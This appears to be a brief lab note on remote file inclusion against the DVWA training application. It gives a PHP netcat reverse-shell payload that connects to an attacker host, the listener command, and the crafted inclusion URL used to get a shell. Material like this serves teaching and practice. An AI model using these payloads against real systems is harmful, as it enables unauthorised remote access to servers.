REMOTE FILE INCLUSION
- Similar to local file inclusion.
- But allows an attacker to read ANY file from ANY server.
- Execute PHP files from other servers on the current server.
- Store PHP files on other servers as .txt.
Pre-Condition:
Set allow_url_include to On status.
Restart web service
Create a local php file on /var/www/html.
<?php passthru("nc -e /bin/sh 10.0.0.13 8080"); ?>
Execute the NC command to wait for connection.
nc -vv -l -p 8080
Visit the URL(http://10.0.0.24/dvwa/vulnerabilities/fi/?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.
We connect to the target machine successfully.